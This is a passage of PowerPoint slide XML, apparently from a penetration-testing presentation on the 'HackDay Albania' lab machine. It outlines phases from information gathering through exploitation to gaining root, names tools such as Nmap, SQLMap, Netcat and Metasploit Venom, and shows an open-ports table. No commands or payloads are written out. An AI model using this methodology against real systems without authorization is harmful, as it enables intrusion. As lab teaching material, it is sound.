    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4278791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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088500" y="1763975"/>
            <a:ext cx="568500" cy="3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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="96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2814775" y="3311325"/>
            <a:ext cx="32169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Gain Root</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102" name="Google Shape;102;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3080448" y="378375"/>
            <a:ext cx="3216900" cy="26930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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6867300" cy="6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latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>Pentesting Approach And Tools Used in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>Each Step</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Raleway"/>
              <a:ea typeface="Raleway"/>
              <a:cs typeface="Raleway"/>
              <a:sym typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="108" name="Google Shape;108;p16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611350" y="2758267"/>
            <a:ext cx="7514400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="611BB8"/>
            </a:solidFill>
            <a:prstDash val="dot"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="817399" y="2126704"/>
            <a:ext cx="176855" cy="682855"/>
            <a:chOff x="648675" y="1656871"/>
            <a:chExt cx="196200" cy="1307400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="110" name="Google Shape;110;p16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="648675" y="2768371"/>
              <a:ext cx="196200" cy="195900"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="611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16"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="110" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="746775" y="1656871"/>
              <a:ext cx="0" cy="1111500"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="009688"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="112" name="Google Shape;112;p16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7641334" y="2725314"/>
            <a:ext cx="176855" cy="698940"/>
            <a:chOff x="2512925" y="2768371"/>
            <a:chExt cx="196200" cy="1404905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="113" name="Google Shape;113;p16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2611025" y="2964276"/>
              <a:ext cx="0" cy="1209000"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="009688"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="114" name="Google Shape;114;p16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2512925" y="2768371"/>
              <a:ext cx="196200" cy="195900"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="611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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3570329" y="2101230"/>
            <a:ext cx="176855" cy="733779"/>
            <a:chOff x="4279200" y="1559371"/>
            <a:chExt cx="196200" cy="1404900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="116" name="Google Shape;116;p16"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="117" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="4377300" y="1559371"/>
              <a:ext cx="0" cy="1209000"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="009688"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="117" name="Google Shape;117;p16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4279200" y="2768371"/>
              <a:ext cx="196200" cy="195900"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="611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16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3406799" y="3441675"/>
            <a:ext cx="2662200" cy="773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800" b="1">
                <a:latin typeface="Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>CeWL; WFuzz; Burpesuite ;CURL; Netcat; Metasploit Venom; OpenSSL; Wireshark; Python/Perl Script; Evolution; SSH; Base64 Decoder</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:latin typeface="Source Sans Pro"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:latin typeface="Source Sans Pro"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611345" y="3535875"/>
            <a:ext cx="2662200" cy="97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Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>Threat Modelling</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Source Sans Pro"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:latin typeface="Source Sans Pro"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1721368" y="2707891"/>
            <a:ext cx="176855" cy="733782"/>
            <a:chOff x="2512925" y="2768371"/>
            <a:chExt cx="196200" cy="1404905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="121" name="Google Shape;121;p16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2611025" y="2964276"/>
              <a:ext cx="0" cy="1209000"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="009688"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122" name="Google Shape;122;p16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2512925" y="2768371"/>
              <a:ext cx="196200" cy="195900"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="611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16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4649461" y="2707246"/>
            <a:ext cx="176855" cy="733782"/>
            <a:chOff x="2512925" y="2768371"/>
            <a:chExt cx="196200" cy="1404905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="124" name="Google Shape;124;p16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2611025" y="2964276"/>
              <a:ext cx="0" cy="1209000"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="009688"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="125" name="Google Shape;125;p16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2512925" y="2768371"/>
              <a:ext cx="196200" cy="195900"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="611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16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6645154" y="2101230"/>
            <a:ext cx="176855" cy="733779"/>
            <a:chOff x="4279200" y="1559371"/>
            <a:chExt cx="196200" cy="1404900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="127" name="Google Shape;127;p16"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="128" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="4377300" y="1559371"/>
              <a:ext cx="0" cy="1209000"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="009688"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="128" name="Google Shape;128;p16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4279200" y="2768371"/>
              <a:ext cx="196200" cy="195900"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="611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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74900" y="632175"/>
            <a:ext cx="2488500" cy="134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000000"/>
                </a:solidFill>
                <a:latin typeface="Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>Information Gathering</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:latin typeface="Source Sans Pro"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>NMAP; OWASP ZAP; Masscan; Wireshark; Google Translate</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:latin typeface="Source Sans Pro"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5898250" y="836600"/>
            <a:ext cx="2791500" cy="10419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800" b="1">
                <a:latin typeface="Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>Post Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:latin typeface="Source Sans Pro"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>Remote Administration tool</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:latin typeface="Source Sans Pro"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:latin typeface="Source Sans Pro"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Google Shape;131;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885851" y="994675"/>
            <a:ext cx="2791500" cy="77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Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>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a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>Joomscan; Nikto; Gobuster; WPScan; SQLMap</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:latin typeface="Source Sans Pro"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Google Shape;132;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6398661" y="3595300"/>
            <a:ext cx="2662200" cy="773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800" b="1">
                <a:latin typeface="Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>Reporting</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Source Sans Pro"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Source Sans Pro"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>Technical Security Assessment</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>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7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="182775" y="1026100"/>
            <a:ext cx="5822125" cy="3777025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="138" name="Google Shape;138;p17"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6253700" y="375700"/>
          <a:ext cx="2515400" cy="1173420"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{158EDE2D-5140-4CE5-8088-8FD6ECF2DEED}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1257700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="12577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a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OPEN PORT</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:solidFill>
                      <a:srgbClr val="999999"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SERVICE</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:solidFill>
                      <a:srgbClr val="99999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22</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>SSH</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8008</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>HTTP</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246550" y="240175"/>
            <a:ext cx="3783300" cy="5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Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>HackDay Albania</a:t>
            </a:r>
            <a:endParaRPr sz="24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8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
